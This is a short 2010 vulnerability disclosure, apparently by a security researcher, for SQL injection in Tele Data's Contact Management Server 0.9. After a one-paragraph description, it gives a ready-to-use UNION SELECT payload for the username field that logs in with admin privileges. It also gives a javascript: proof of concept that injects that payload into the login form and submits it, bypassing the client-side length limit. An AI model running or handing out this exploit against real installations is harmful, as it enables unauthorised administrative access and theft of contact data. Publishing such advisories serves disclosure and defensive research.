teledatacms-sql.txt
Posted on 28 April 2010
|=================================================================================================| | ___ ___ ___ ___ ___ ___ | | / / /\__ ___ / / / | | /:: /:: /::| | / /:: /:: /:: | | /:/: /:/: /:|:| | : /:/: /:/: /:/: | | /:/ : /:/ : /:/|:| |__ /::\__ /::~: /::~: /::~: | | /:/__/ :\__ /:/__/ :\__ /:/ |:| /\__ __/://__/ /:/: :\__ /:/: :\__ /:/: :\__ | | : /__/ : /:/ / /__|:|/:/ / //:/ / /__: /__/ :~: /__/ /_|::/:/ / | | : : /:/ / |:/:/ / ::/__/ :\__ : :\__ |:|::/ / | | : :/:/ / |::/ / :\__ /__/ : /__/ |:|/__/ | | :\__ ::/ / /:/ / /__/ :\__ |:| | | | /__/ /__/ /__/ /__/ |__| | | | |=================================================================================================| | | | Vulnerability............SQL Injection | | Software.................Tele Data's Contact Management Server 0.9 | | Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe | | Date.....................4/28/10 | | | |=================================================================================================| | | | Site.....................http://cross-site-scripting.blogspot.com/ | | Email....................john.leitch5@gmail.com | | | |=================================================================================================| | | ##Description## | | There isn't much in the way of security here. It's possible to log in with admin priviledges by | injecting SQL into the username field. As there are client side length contstraints in place for | the username field I packaged the exploit in some javascript for ease of use. | | | ##Exploit## | | ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;-- | | | ##Proof of Concept## | | javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit(); | |=================================================================================================|
